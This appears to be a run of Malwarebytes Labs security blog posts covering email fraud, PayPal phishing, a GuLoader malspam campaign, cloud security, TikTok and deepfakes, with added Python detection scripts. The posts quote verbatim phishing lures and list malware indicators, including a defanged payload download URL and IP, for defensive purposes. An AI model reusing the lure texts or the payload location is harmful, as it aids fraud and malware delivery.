IT NEWS

Business email compromise: gunning for goal

The evergreen peril of business email compromise (BEC) finds itself in the news once more. This time, two English Premier League football clubs almost fell victim to fraudsters, to the tune of £1 million.

First half: fraudsters on the offensive

The attackers compromised a Managing Director’s email account after they logged into a phishing portal linked from a bogus email. Fake accounts set up during the transfer window, when clubs buy and sell players, provided the opening the fraudsters needed to insert themselves into the conversation between the two clubs. Both sides were soon conversing with impostors, who changed the banking details for the payment. No money reached the scammers, because the bank recognised the fraudulent account.

As with so many BEC attacks, the weak point was unsecured email with no additional measures in place. Some 2FA would have helped immeasurably here, along with additional precautions. We’ve talked about this previously, where organisations may have to accept some slowdown in their activities behind the scenes for the extra protection afforded. Does the CEO need to confirm wires over the phone with someone in another timezone? Will it slow things down a little?

That is, for some, the cost of doing business while scammers are about. The trick is coming up with controls that work for you, in a way that doesn’t meet with objections from either the board or the people who have to use these processes every day.

The sporting sector is under attack digitally on all fronts at the moment. You can read about some of the other attacks, and a few more BEC-related shenanigans, in the NCSC report.

Second half: BEC keeps the pressure up

BEC scams have gained a lot of visibility these past few weeks.

Big financial losses sit alongside the embarrassment of going public about a compromise. We almost certainly don’t know the true extent of the damage. Ransomware and similar blackmail threats cause the same problem when trying to estimate impact.

BEC isn’t just some sort of amateur hour, either. The pros are absolutely doing what they can in this realm to further enhance their profits.

Extra time: the long arm of the law

Organisations and people often realise too late that once a wire has been sent, the cash is gone for good. The attack relies on stealth: making away with the money without anybody noticing until it’s too late.

On the other hand, busts do happen. Turns out being massively visible with some 2.4 million Instagram followers might not be the best way to remain Guy Incognito. After a little under 1 million dollars was swiped from a victim in the US, the FBI found evidence of communications between a popular social media star and the alleged co-conspirators of the fraud. The FBI filed a criminal complaint in June which alleges all of the social media star’s wealth was gained illegally.

Interestingly, there’s mention of yet another attempt on an English Premier League football club. This time, however, the money up for grabs is significantly larger: £100 million, versus £1 million.

Ouch.

Penalties: one final multi-pronged attack

It’s not just the standard BEC we need to be concerned about. There are many divergent routes into your business originating from roughly the same starting position. Vendor email compromise, where the attacker works from a compromised supplier’s mailbox rather than your own, has gained prominence since its more well-known sibling came to light, so add that to the growing list of things to defend against. The successful attack on a major European cinema chain for $21 million is starting to seem like small potatoes at this point, though most definitely not for anyone caught in the fallout.

Some scammers roll with malware. For others, it’s a case of burning a horribly expensive exploit. The hope is that it’ll make several times the amount paid for it initially. The rest lurking in the shadows? Big money from malvertising, or gaming social media with a splash of viral spread and a lot of stolen clicks.

Meanwhile, over there, we have a group of people piecing together the inner workings of your organisation from information freely available online. At this very moment, they’re considering sending some innocent missive, just to see if the mail address is live and if the person responsible for it replies.

You won’t hear from them again…but you almost certainly will see a mail from something claiming to be your system administrator urging you to reset your login details.

Where both you and your organisation’s cash reserves end up after that, is entirely down to whatever planning was made beforehand.

How ready will you be when the business email compromisers come calling?

The post Business email compromise: gunning for goal appeared first on Malwarebytes Labs.

Lock and Code S1Ep12: Pinpointing identity and access management’s future with Chuck Brooks

This week on Lock and Code, we discuss the top security headlines generated right here on Labs and around the Internet. In addition, we talk to Chuck Brooks, cybersecurity evangelist and adjunct professor for Georgetown University’s Applied Intelligence Program and graduate Cybersecurity Programs, about identity and access management technology.

This set of technologies and policies controls who accesses what resources inside a system—from company files being locked away for only some employees, to even your online banking account being accessible only to you.

But with more individuals using more accounts to access more resources than ever before, threats have similarly emerged.

Tune in to hear about the uses of identity and access management technology, how the tech will be influenced by other technologies in the future, and more, on the latest episode of Lock and Code, with host David Ruiz.

You can also find us on the Apple iTunes store, Google Play Music, and Spotify, plus whatever preferred podcast platform you use.

We cover our own research on: 

Other cybersecurity news

Stay safe, everyone!

The post Lock and Code S1Ep12: Pinpointing identity and access management’s future with Chuck Brooks appeared first on Malwarebytes Labs.

Avoid these PayPal phishing emails

For the last few weeks, there’s been a solid stream of fake PayPal emails in circulation, twisting FOMO (fear of missing out) into DO THIS OR BAD THINGS WILL HAPPEN. It’s one of the most common tools in the scammer’s arsenal, and a little pressure applied in the right way often brings results for them.

Claim people are going to lose something, or incur charges, or miss out on a valuable service, and they’ll come running. Below is an outline of who these emails claim to be from, what they look like, and the kind of panic-clicking that they’re pushing. These are just a few examples; there are many, many others.

Common factors

Most of the mails we’ve seen claim to be sent from

Secure(AT)intl-limited(DOT)com

Or variations thereof, although the actual email address being used is frequently just a mishmash of random letters / words / numbers. They also mostly make claims that your account is limited, or restricted in some way, or there’s been some unusual activity on your account and now you must prove you were the one making (non-existent) transactions.
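The common factors above (a sender domain that isn’t the brand’s, a link whose hostname contains the brand name but belongs to someone else, and a couple of pressure phrases) can be turned into a simple triage check. The script below is an added example written for this page, not PayPal’s or Malwarebytes’ code. The two messages it parses are constructed to resemble the lures quoted above, and BRAND_DOMAINS is an assumed allowlist that a real deployment would maintain from the brand’s published sending domains.

```python
import re
from email import message_from_string, policy
from email.utils import parseaddr

BRAND = "paypal"
# Assumption for this example: domains the real service sends mail from and links to.
BRAND_DOMAINS = {"paypal.com", "paypal.co.uk"}
# Phrases the lures above lean on to make the reader panic-click.
PRESSURE_TERMS = [
    r"\blimited\b", r"\brestricted\b", r"\bunusual activity\b", r"\bsuspend(ed)?\b",
    r"\bverify your (identity|account)\b", r"\bacceptable use policy\b",
    r"\bwithin \d+ (hours|days)\b",
]
URL_HOST = re.compile(r"https?://([^\s/\"'<>]+)", re.I)

# Constructed samples modelled on the scam mails quoted above; not real captured messages.
SAMPLE_PHISH = """From: "PayPal Service" <Secure@intl-limited.com>
To: victim@example.org
Subject: Re: [Important] - Your account was temporary limited
Content-Type: text/plain; charset=utf-8

After a recent review of your account activity, we've determined you are in
violation of PayPal's Acceptable Use Policy. Your account has been limited
until we hear from you. Log in at http://paypal.com.intl-limited.com/login
"""

SAMPLE_LEGIT = """From: "PayPal" <service@paypal.com>
To: victim@example.org
Subject: Your receipt for order 12345

Thanks for your payment. View details at https://www.paypal.com/activity
"""


def registered_domain(host):
    """Crude eTLD+1: the last two labels, or three when the TLD is two letters
    (co.uk style). Enough for the allowlist above; use the Public Suffix List in production."""
    labels = host.lower().rstrip(".").split(".")
    if len(labels) >= 3 and len(labels[-1]) == 2 and len(labels[-2]) <= 3:
        return ".".join(labels[-3:])
    return ".".join(labels[-2:])


def analyze_message(raw):
    """Return triage flags for one RFC 5322 message given as a string."""
    msg = message_from_string(raw, policy=policy.default)
    display, addr = parseaddr(msg.get("From", ""))
    sender_domain = registered_domain(addr.rpartition("@")[2]) if "@" in addr else ""
    body = "\n".join(p.get_content() for p in msg.walk()
                     if p.get_content_type() == "text/plain")
    text = msg.get("Subject", "") + "\n" + body
    low = text.lower()
    flags = []

    # 1. The mail speaks as the brand but the From domain is someone else's.
    claims_brand = BRAND in display.lower() or BRAND in low
    if claims_brand and sender_domain not in BRAND_DOMAINS:
        flags.append("sender_domain_mismatch")

    # 2. A link whose hostname contains the brand but whose registrable domain is not the brand's.
    for host in URL_HOST.findall(text):
        host = host.split("@")[-1].split(":")[0]   # drop user:pass@ tricks and any port
        if BRAND in host.lower() and registered_domain(host) not in BRAND_DOMAINS:
            flags.append("lookalike_link")
            break

    # 3. Two or more pressure phrases across subject and body.
    pressure = [t for t in PRESSURE_TERMS if re.search(t, low)]
    if len(pressure) >= 2:
        flags.append("pressure_language")

    verdict = "suspicious" if len(flags) >= 2 else ("review" if flags else "pass")
    return {"from": addr, "sender_domain": sender_domain, "flags": flags,
            "pressure_terms": pressure, "verdict": verdict}


if __name__ == "__main__":
    for name, sample in (("phish", SAMPLE_PHISH), ("legit", SAMPLE_LEGIT)):
        print(name, analyze_message(sample))
```

None of these three signals is conclusive on its own (a genuine notification can say “limited”, and marketing mail is often sent from a third-party domain), which is why the verdict only turns to “suspicious” when two of them coincide. The link check deliberately looks at the registrable domain rather than the hostname, because the lure’s favourite trick is a hostname that starts with the brand name and ends somewhere else entirely.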

It’s very similar to this batch of missives from 2015, where scammers were after credit card / payment details. Here are some of the mails, to give you an idea of what to look out for. They are typically awash with typos, and we’ve not corrected any of their mistakes.

scammail 1

Scam mails

Re: [Important] – Your account was temporary limited

We would like to inform you of certain modifications to our user contracts which concern you.

No action is required on your part. However, if you would like to know more, we invite you to consult our Policy Updates page where you will find the details of these modifications, in which cases they apply and how to refuse them, if applicable.

After a recent review of your account activity. we’ve determined you are in violation of PayPal’s Acceptable Use Policy. Your account has been limited until we hear from you. While your account is limited, some options in your account won’t be available.

Re: [Renewal of the Order Receipt] Sign Up for Bank Statement Updates use Google Chrome from Marshall Islands

Dear Customer Service

Your paypal account has been limited because we’ve noticed significanyt changes in your account activity. As your payment ptocessor, we need to understand these changes better. This account limitation will affectr your ability to:

Send or receive money

Withdraw money from your account

Add or remove a card & bank account

Dispute a transaction

Close your account

What to do next?

Please logi in to your paypal account and proviude the requested information thought {SIC} the resolution center

Re: Submitted : Statement update login with Google Chrome From Taiwan, Province of China

Your PayPal account has been limited

Dear Customer,

Our service is improving the security system for all PayPal account. The reason, many accounts have been hacked by someone to order an item using a credit / debit / bank card in account associated.

For the convenience and security of PayPal, we have limited all accounts registered.

PayPal is the safer, faster way to pay. To recovery your account, you can click the link button below and proceed with identity verification to prove that it is your account.

Re: Reminder: [Daily Report] [Update News] [System known] Update-informatie zie factuur van – Statement Update New Login

Your paypal account is temporarily limited

Hello client,

We noticed that you’ve been using your Paypal account in a questionable manner. To understand this better, we just need more information from you.

To ensure that your account remains secure, we need you to take action on your account. We’ve also temporarily limited certain features in your account

Currently, You won’t be able to:

• Send Payments

• Withdraw Funds

What should you do?

Log in to your Paypal account follow the steps and perform the required tasks.

RE: Reminder: [Daily Report] [Statement Agreement] We have sent notifications. Automatic updates 

Your account has been limited.

Hello, Customer

We’ve limited your account

After a recent review of your account activity, we’ve determined you are in violation of PayPal’s Acceptable Use Policy. Please log in to confirm your identity and review all your recent activity

You can find the complete PayPal Acceptable Use Policy by clicking Legal at the bottom of any PayPal page.

Help and advice for avoiding scams

PayPal has expanded its security resources in recent years. They now have a portal for multiple forms of suspicious activity, a section for reporting phish scams, and protection for buyers and sellers.

You can also check out part 1 of our 3-part Phishing 101 guide.

These emails won’t be drying up anytime soon, so please be on your guard and, as always, visit the PayPal website directly from your browser should you receive any messages claiming you’ve been limited or locked out. If it’s genuine, then customer service will be able to assist. If it isn’t, help both PayPal and everyone else by reporting the phish. It’s a win-win scenario.

The post Avoid these PayPal phishing emails appeared first on Malwarebytes Labs.

Malspam campaign caught using GuLoader after service relaunch

They say any publicity is good publicity. But perhaps this isn’t true for CloudEye, an Italian firm that claims to provide “the next generation of Windows executables’ protection”.

First described by Proofpoint security researchers in March 2020, GuLoader is a downloader used by threat actors to distribute malware on a large scale. In June, CloudEye was exposed by CheckPoint as the entity behind GuLoader.

Following the spotlight from several security firms and news outlets, GuLoader activity dropped in late June. But around the second week of July, we started seeing the downloader in malspam campaigns again.

Protection and evasion attract criminal element

While the concept of downloaders is certainly not new, GuLoader itself found its origins in DarkEye Protector, a crypter sold in various forums circa 2011, which later evolved into CloudEye.

Designed as a product to prevent reverse engineering and protect against other forms of code theft, CloudEye is a Visual Basic 6 downloader that leverages cloud services to store and retrieve the final piece of software (in the form of heavily obfuscated shellcode) a customer wants to install.

GuLoader/CloudEye has proved to be very effective at bypassing sandboxes and security products including network-based detection.

Figure 1: GuLoader executed in a sandbox and detecting it

This is exactly the kind of feature criminals may want to distribute their malware. Unsurprisingly, this is exactly what happened and at one point GuLoader became the most popular malicious attachment in our spam honeypot.

Figure 2: Most popular attachments by tags in Malwarebytes email telemetry

Back in business

On July 11, CloudEye announced it was resuming its business after about a month of interruption during which time sales stopped and accounts used by malicious actors were banned.

Figure 3: CloudEye website announcing return of service

What prompted us to visit the company’s website, and find this announcement, was seeing GuLoader back in the wild. We noted malspam activity using the classic DHL delivery lure pushing GuLoader again:

Figure 4: Malspam using DHL theme to push GuLoader

GuLoader and stealers

The attachment is an ISO file, which Windows 10 opens by mounting it as a drive; at the time, an executable launched from a mounted ISO did not carry the mark-of-the-web that a directly attached .exe would, which is part of the container’s appeal to spammers. Inside is the GuLoader executable, written in Visual Basic. Using a decompiler, you can reveal one of its forms, which is very typical of GuLoader:

Figure 5: Decompiled view of GuLoader showing VB form

When executed, it attempts to connect to a remote server to download its payload. By the time we checked this sample, that server no longer responded. However, a PCAP of the original download was available on VirusTotal, which allowed us to replay the payload to the malware so that it would proceed to load it as normal.

Figure 6: Dumping shellcode from memory to disk

We used PE-Sieve to dump the shellcode from memory into a file on disk and to reconstruct the decoded payload as a standalone PE file.

Figure 7: Comparing shellcode with file on disk

It turned out to be the FormBook stealer, which is consistent with the type of payloads we see associated with GuLoader.

Popular tool already cracked?

We believe one particular threat group is running malspam campaigns both with and without GuLoader, in the latter case using RAR attachments to spread other stealers.

Once a tool has proved to be popular and effective for criminal purposes (whether it was built for legitimate reasons or not), it will continue to fuel malware campaigns.

It’s quite possible that, of the many GuLoader builders in circulation, some have been cracked and are now being used by threat actors of their own accord, independent of CloudEye’s account bans.

We track the GuLoader malspam campaigns and continue to protect our customers against this threat.

Figure 8: Malwarebytes Nebula’s detection of GuLoader

Thanks to S!Ri for the heads up on the return of GuLoader.

Indicators of Compromise

GuLoader

DHL_AWB_INV_9882900_99862788_998.exe
8a13de21c0cb1d10e4ee93394794e0714f4a58994be543ac94592b6f8abc53dc

Shellcode loaded by GuLoader

fbdoskitryupanel.webredirect[.]org/uploud/5bab0b1d864615bab0b1d864b3/bin_koLHz220.bin
45.76.45[.]167

Decoded shellcode into binary

7b4d3b6eb50a072d36f6233aeb56352735c59dd54ba54d6e6fbca6b23a1739d5
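The indicators above are published defanged (`[.]` in place of `.`), which is good hygiene for a write-up but means they need normalising before they can be fed into a log search or a hash lookup. The script below is an added example, not Malwarebytes’ tooling: it refangs the indicators listed on this page, runs them over a handful of constructed proxy log lines (the log format and the internal client addresses are invented for the demonstration), and offers a SHA-256 check for extracted attachments.

```python
import hashlib
import re

# Indicators as published above, kept in their defanged form.
PUBLISHED_IOCS = {
    "sha256": {
        "8a13de21c0cb1d10e4ee93394794e0714f4a58994be543ac94592b6f8abc53dc",
        "7b4d3b6eb50a072d36f6233aeb56352735c59dd54ba54d6e6fbca6b23a1739d5",
    },
    "url": {"fbdoskitryupanel.webredirect[.]org/uploud/5bab0b1d864615bab0b1d864b3/bin_koLHz220.bin"},
    "ip": {"45.76.45[.]167"},
}

# Constructed proxy log lines (format and client addresses invented for this example).
SAMPLE_PROXY_LOG = [
    "2020-07-14T10:03:22Z 10.0.0.15 GET http://fbdoskitryupanel.webredirect.org/uploud/5bab0b1d864615bab0b1d864b3/bin_koLHz220.bin 200",
    "2020-07-14T10:03:25Z 10.0.0.15 GET https://www.microsoft.com/ 200",
    "2020-07-14T10:04:01Z 10.0.0.22 CONNECT 45.76.45.167:443 200",
    "2020-07-14T10:04:09Z 10.0.0.22 CONNECT 145.76.45.167:443 200",
]


def refang(indicator):
    """Undo the usual defanging conventions so the indicator matches what logs actually contain."""
    s = indicator.strip()
    s = re.sub(r"\[\.\]|\(\.\)|\[dot\]|\(dot\)", ".", s, flags=re.I)
    s = re.sub(r"^hxxp", "http", s, flags=re.I)
    return s.replace("[:]", ":").replace("[@]", "@").replace("[/]", "/")


def compile_iocs(raw):
    """Refang everything and derive a domain set from the URLs so bare-host log formats still match."""
    urls = {refang(u) for u in raw.get("url", ())}
    domains = {re.sub(r"^https?://", "", u, flags=re.I).split("/")[0].split(":")[0].lower()
               for u in urls}
    ips = {refang(i) for i in raw.get("ip", ())}
    hashes = {h.lower() for h in raw.get("sha256", ())}
    return {"url": urls, "domain": domains, "ip": ips, "sha256": hashes}


def _token_pattern(indicator):
    # Whole-token match: 45.76.45.167 must not fire on 145.76.45.167 or 45.76.45.1670,
    # and a domain must not fire when it is merely a prefix of a longer name.
    return re.compile(r"(?<![A-Za-z0-9.-])" + re.escape(indicator)
                      + r"(?![A-Za-z0-9-]|\.[A-Za-z0-9])", re.I)


def scan_log(lines, iocs):
    """Return one hit per matching indicator; the most specific indicator type wins per line."""
    hits = []
    for n, line in enumerate(lines, 1):
        for kind in ("url", "domain", "ip"):
            matched = [ind for ind in iocs[kind] if _token_pattern(ind).search(line)]
            if matched:
                hits.extend({"line": n, "type": kind, "indicator": m} for m in matched)
                break
    return hits


def sha256_hit(data, iocs):
    """Return the digest if the blob (e.g. an extracted attachment) is a known sample, else None."""
    digest = hashlib.sha256(data).hexdigest()
    return digest if digest in iocs["sha256"] else None


if __name__ == "__main__":
    iocs = compile_iocs(PUBLISHED_IOCS)
    for hit in scan_log(SAMPLE_PROXY_LOG, iocs):
        print(hit)
    print(sha256_hit(b"constructed benign bytes", iocs))
```

The token boundaries matter more than they look: a naive substring search for the IP would also light up on any address that merely contains it, and a domain indicator would fire on `…webredirect.org.example` as well. Hash matching is the weakest of the three, since the next DHL lure will carry a freshly packed executable; the domain and IP are what you would expect to see again across a campaign.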

The post Malspam campaign caught using GuLoader after service relaunch appeared first on Malwarebytes Labs.

Cloud workload security: Should you worry about it?

Due to the increasing use of the cloud, organizations find themselves dealing with hybrid environments and nebulous workloads to secure. Containerization and cloud-stored data have provided the industry with a new challenge. And while you can try to make the provider of cloud data storage responsible for the security of the data, you will have a hard time trying to convince the provider that they are responsible for your cloud workload security.

What are you talking about?

Let us explain some of the less common terms for those that are unfamiliar with them.

The goal of containerization is to allow applications to run consistently and efficiently across different computing environments, whether that is a desktop or a virtual machine, Windows or Linux. The demand for applications to run the same way on different systems and infrastructures has moved development of this technology along at a rapid pace. The use of different platforms within business organizations and the move to the cloud are undoubtedly huge contributors to this demand. Containerization is commonly deployed in cloud environments, which is part of what makes it scale.

While there are many providers of cloud data storage, providers that offer containerization services for the moment are almost exclusively the big players, like Amazon Web Services, Oracle, and Microsoft Azure.

Static, or even constantly changing, data are easier to protect than active processes. And a cloud workload can range from simple web applications to complex organization-specific workflow management systems.

Cloud workload security

From a security standpoint, the isolation between containers is a good thing. If one container is compromised, it is much harder for malware to cross over to another container, because the host operating system gives each container its own namespaces. It is not a hard boundary, though: all containers on a host share one kernel, so a kernel vulnerability, a privileged container, or a host path mounted into the container can still bridge them. And as you can imagine, this separation also makes it harder to devise a security solution for the whole complex of containers that are in use.

Traditionally, security software was designed to keep your IT environment protected from the outside world. Nowadays, cutting the environment off from the outside world would make cloud resources unavailable and disconnect remote workers from the company network. Because security was one of the major concerns holding organizations back from moving their data and workloads to the cloud, a lot of attention has been given to cloud workload security.

The first step in expanding your security perimeter to include the cloud workload is to make the cloud environment secure by design, meaning that the security implications were considered at every step of the design rather than bolted on afterwards.

Your IT department and cloud resources

One common mistake is that organizations or teams within the organization start using cloud resources without involving their in-house IT/security department. While this may seem trivial or they may not even be thinking of the new “app” as a cloud resource, it does have an impact on the security perimeter and the responsible team should be aware of the change.

Organization of cloud security

The way cloud security is organized depends very much on where the responsibility for the security of the cloud resources lies. Models vary from completely in-house to fully external, where the cloud security provider takes full responsibility for all the resources and provides the necessary security layers.

Application layer

Web applications are secured in the application layer. This layer generally consists of a few elements designed to protect the applications from outside threats. The main element can be a customized firewall combined with end-to-end encryption. This shields the applications from threats and protects the data stream from being intercepted and read.

Hypervisor layer

Another important layer for cloud workload security is the hypervisor layer. The security setup in this layer is designed to keep the cloud server’s virtualization environment safe. In this environment you will find the guest operating systems and virtual networks. This layer’s security also covers the containers that are running inside virtual machines. The main component of security in this layer is application hardening: in-house apps need to be coded with security in mind, and third-party software needs to be updated and patched in a timely manner.

Security orchestration

In such a layered and complex environment another important element is the security orchestration. Orchestration in this context implies:

  • Solutions working together without interrupting each other.
  • Streamlining workflow processes so that each component does what it does best.
  • Unification so that data is exported in a user-friendly and organized manner.

Security orchestration is ideally possible even when security software comes from different vendors. However, the setup often needs to be tuned to get the most out of what each solution has to offer, without one interfering with the effectiveness of another.

In general, it’s easier to effectively orchestrate specialized applications from different vendors than it is to orchestrate overlapping applications from different vendors. The overlap between rivalling applications tends to be the field where the accidents happen. Either because features are disabled so they do not cause interference, or because one application is expected to catch something and the other doesn’t need to watch that area.

Rise in importance

As cloud applications continue to grow in absolute numbers and relative size for your organization it is imperative to look at the structure and organization of your security perimeter and into the way you want to secure that perimeter. Some points of attention as your organization grows in this direction:

  • Make sure the security and IT teams are aware of every cloud application in use.
  • Scout the possibilities of security applications from different vendors and how you can best manage and orchestrate them.
  • Inform yourself about the different types of cloud-based applications you are using and whether they need a specific security approach.
  • Do not rely on your cloud provider to have security automatically arranged for you. If you do decide to rely on the cloud services provider for security arrangement as well, make sure you and your IT staff are aware of the boundaries and limitations of their coverage.

Stay safe everyone!

The post Cloud workload security: Should you worry about it? appeared first on Malwarebytes Labs.

TikTok is being discouraged and the app may be banned

In recent news, retail giant Amazon sent a memo to employees telling them to delete the popular social media app TikTok from their phones. The memo stated that the app posed a security risk, without going into details. Later the memo was withdrawn with no explanation other than that it was sent in error. Are we curious yet, my dear Watson?

What is TikTok

For those of us that can’t tell one social media app from another, TikTok is one of the most popular ones, designed to let users upload short videos for others to like and share. Functionality has grown from a basic lip-sync app to host a wide variety of short video clips. It is predominantly popular among a younger audience: most users are between 13 and 24 years old. In the first quarter of 2019, TikTok was the most downloaded app in the App Store, with over 33 million installs. TikTok is owned by a Chinese tech company called ByteDance.

Nation states’ attention

This wasn’t the first time TikTok faced removal from a number of devices. India has already banned TikTok, and the USA and Australia are also considering blocking the app. In fact, in December the US Army banned TikTok from its phones, and in March US senators proposed a bill that would block TikTok from all government devices.

Is TikTok safe?

For starters, TikTok being a Chinese product does not help. A number of Chinese apps and software packages have been under investigation and were found to be “calling home”. Now, this does not automatically mean they are spying on you, but when you start an investigation with a negative expectation, you are inclined to see it as such. And gathering information about a user without their consent is wrong regardless of who is doing it.

The fact that TikTok is different in China itself, where it goes under the name Douyin, is another factor. But this could be explained away as well, since China has a reputation for spying on its own population, so the foreign version may simply be less intrusive than the domestic one. And some governments have their own reasons not to trust anything of Chinese origin, or another agenda for boycotting products originating from China.

Adding to the suspicion, a Reddit user by the handle of bangorlol posted comments about the data he found being sent home when he reverse-engineered the app. The same user has started a thread on Reddit where he invites other reverse engineers to cooperate on newer versions of the app. One type of behavior that was confirmed by another source is that the app reads the contents of the clipboard, which certainly goes above and beyond what other social media apps do.

TikTok’s defense

TikTok’s main defense consists of the fact that most of their senior staff are outside of China. On their blog they also specified where their data are stored and that the data are not subject to Chinese law.

“TikTok is led by an American CEO, with hundreds of employees and key leaders across safety, security, product, and public policy here in the US. We have never provided user data to the Chinese government, nor would we do so if asked.”

Options to ban TikTok completely

Besides organizations like Wells Fargo and some branches of the US military asking their employees to refrain from using the app on devices that also hold organizational data, we have also seen countries advocating a total ban of the app. But this is not an easy goal to achieve and could also prove to be ineffective.

For a total ban of an app you would have to get it removed from the official app stores. This is harder to achieve for some countries than for others. India banned TikTok along with 58 other Chinese apps. The US government would have to find a legally sound reason to request that Apple and Google pull TikTok from their app stores, and would probably meet with a lot of resistance.

Besides, if people want to install a popular app like TikTok, there are many other sources. Downloads are not limited to the official app stores, so a determined user will be able to find the app elsewhere. And a store removal does not stop the millions of existing users from continuing to use the copy they already have.

Another option is to give TikTok the same treatment as was handed to Huawei: put ByteDance on the Commerce Department’s Entity List, which would deny them access to US technology. Given the circumstances, that doesn’t accomplish much more than denying them access to the app stores, with the same consequences as discussed above.

Social media and privacy

We have warned many times against posting privacy-sensitive information on social media, and offered guidance on using social media safely, for you and your children. We even posted a guide for those who want to remove themselves from the major social media platforms.

But when the social media app itself is determined to mine your data it becomes a whole different story. We have seen no conclusive proof that this is true for TikTok, but some of the allegations are very serious and seem to be supported by facts and authoritative research.

Anonymous warns about TikTok

Other analysts dismissed the researchers’ findings as jumping to conclusions. One thing is for sure: a full analysis without the help of the developers will take a lot of effort and time, and even then the results may still be disputable. At this point we cannot be sure whether the TikTok app is spying on its users in a way that goes deeper than we might expect from an ordinary social media app.

All we can do at this point is to inform our users about the ongoing discussion and maybe explain some of the points that are being brought up. We also feel the need to repeat our warnings about the difficult relationship between social media and privacy. Obviously if any concrete facts should surface we will keep you posted.

Stay safe everyone!

The post TikTok is being discouraged and the app may be banned appeared first on Malwarebytes Labs.

A week in security (July 20 – 26)

Last week on Malwarebytes Labs, our Lock and Code podcast delved into Bluetooth and beacon technology. We also dug into APT groups targeting India and Hong Kong, covered a law enforcement bust, and tried to figure out when, exactly, a Deepfake is a Deepfake.

Other cybersecurity news

Stay safe!

The post A week in security (July 20 – 26) appeared first on Malwarebytes Labs.

Deepfakes or not: new GAN image stirs up questions about digital fakery

Subversive deepfakes that enter the party unannounced, do their thing, then slink off into the night without anybody noticing are where it’s at. Easily debunked clips of Donald Trump yelling THE NUKES ARE UP or something similarly ludicrous are not a major concern. We’ve already dug into why that’s the case.

What we’ve also explored are the people-centric ways you can train your eye to spot stand-out flaws and errors in deepfake imagery: essentially, GANs (generative adversarial networks) gone wrong. There will usually be something a little off in the details, and it’s up to us to discover it.

Progress is being made in the realm of digital checking for fraud, too, with some nifty techniques available to see what’s real and what isn’t. As it happens, a story is in the news which combines subversion, the human eye, and even a splash of automated examination for good measure.

A deepfake letter to the editor

A young chap, “Oliver Taylor”, studying at the University of Birmingham found himself with editorials published in major news sources such as the Times of Israel and the Jerusalem Post, with his writing “career” apparently kicking into life in late 2019, followed by additional articles in various places throughout 2020.

After a stream of these pieces, everything exploded in April when a new article from “Taylor” landed making some fairly heavy accusations against a pair of UK-based academics.

After the inevitable fallout, it turned out that Oliver Taylor was not studying at the University of Birmingham. In fact, he was apparently not real at all and almost all online traces of the author vanished into the ether. His mobile number was unreachable, and nothing came back from his listed email address.

Even more curiously, his photograph bore all the hallmarks of a deepfake (or, controversially, not a “deepfake” at all; more on the growing clash over descriptive names later). Regardless of what you intend to class this man’s fictitious visage as, in plain terms, it is an AI-generated image designed to look as real as possible.

Had someone created a virtual construct and bided their time with a raft of otherwise unremarkable blog posts simply to get a foothold on major platforms before dropping what seems to be a grudge post?

Fake it to make it

Make no mistake, fake entities pushing influential opinions is most definitely a thing. Right-leaning news orgs have recently stumbled into just such an issue. Not so long ago, an astonishing 700 pages with 55 million followers were taken down by Facebook in a colossal AI-driven disinformation blowout dubbed “Fake Face Swarm.” This large slice of Borg-style activity made full use of deepfakes and other tactics to consistently push political messaging with a strong anti-China lean.

Which leads us back to our lone student, with his collection of under-the-radar articles, culminating in a direct attack on confused academics. The end point—the 700 pages worth of political shenanigans and a blizzard of fake people—could easily be set in motion by one plucky fake human with a dream and a mission to cause aggravation for others.

How did people determine he wasn’t real?

Tech steps up to the plate

A few suspicions, and the right people with the right technology in hand, is how they did it. There’s a lot you can do to weed out bogus images, and there’s a great section over on Reuters that walks you through the various stages of detection. No longer do users have to manually pick out the flaws; technology will (for example) isolate the head from the background, making it easier to see frequently distorted flaws. Or perhaps we can make use of heatmaps generated by algorithms to highlight areas most suspected of digital interference.

Even better, there are tools readily available which will give you the under-the-hood summary of what’s happening with one image.

Digging in the dirt

If you edit a lot of photographs on your PC, you’re likely familiar with EXIF metadata. This is a mashing together of lots of bits of information at the moment the photo is taken. Camera/phone type, lens, GPS, colour details—the sky’s the limit. On the flipside, some of it, like location data, can potentially be a privacy threat so it’s good to know how to remove it if needs be.

As with most things, it really depends what you want from it. AI-generated images are often no different.

There are many ways to stitch together your GAN imagery. This leaves traces, unless you try to obfuscate it or otherwise strip some information out. There are ways to dig into the underbelly of a GAN image, and bring back useful results.
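As an added example (not from the original post) of the metadata check the EXIF paragraph above describes: a small standard-library parser that walks a JPEG's marker segments, reports whether the Exif block carries a GPSInfo pointer (i.e. location data), and writes a copy with the Exif block removed. The sample JPEG is a constructed skeleton, not a real photo.

```python
"""Added example (not from the article): list the marker segments of a JPEG,
check whether its Exif APP1 block carries a GPSInfo pointer, and produce a
copy with the Exif block stripped. Standard library only."""
import struct

SOI = b"\xff\xd8"
APP1, SOS, EOI = 0xE1, 0xDA, 0xD9
EXIF_HEADER = b"Exif\x00\x00"
MAKE_TAG = 0x010F      # camera make (ASCII) in IFD0
GPS_IFD_TAG = 0x8825   # GPSInfo IFD pointer in IFD0; its presence means location data


def iter_segments(data: bytes):
    """Yield (marker, payload, raw) per segment up to SOS; the entropy-coded
    scan that follows SOS is yielded once more as (None, tail, tail)."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG: missing SOI")
    pos = 2
    while pos < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == EOI or 0xD0 <= marker <= 0xD7:   # markers without a length field
            yield marker, b"", data[pos:pos + 2]
            pos += 2
            continue
        length = struct.unpack(">H", data[pos + 2:pos + 4])[0]
        raw = data[pos:pos + 2 + length]
        yield marker, raw[4:], raw
        pos += 2 + length
        if marker == SOS:            # scan data is not marker-structured; hand it back whole
            yield None, data[pos:], data[pos:]
            return


def ifd0_tags(app1_payload: bytes) -> set:
    """Tag IDs present in IFD0 of an Exif APP1 payload (empty set if not Exif)."""
    if not app1_payload.startswith(EXIF_HEADER):
        return set()
    tiff = app1_payload[len(EXIF_HEADER):]
    endian = {b"II": "<", b"MM": ">"}[tiff[:2]]
    magic, ifd0 = struct.unpack(endian + "HI", tiff[2:8])
    if magic != 42:
        raise ValueError("bad TIFF magic in Exif block")
    count = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])[0]
    return {struct.unpack(endian + "H", tiff[ifd0 + 2 + 12 * i: ifd0 + 4 + 12 * i])[0]
            for i in range(count)}


def has_gps_data(data: bytes) -> bool:
    return any(marker == APP1 and GPS_IFD_TAG in ifd0_tags(payload)
               for marker, payload, _ in iter_segments(data))


def strip_exif(data: bytes) -> bytes:
    """Copy of the JPEG with every Exif APP1 segment removed; all other
    segments and the scan data are kept byte for byte."""
    out = bytearray(SOI)
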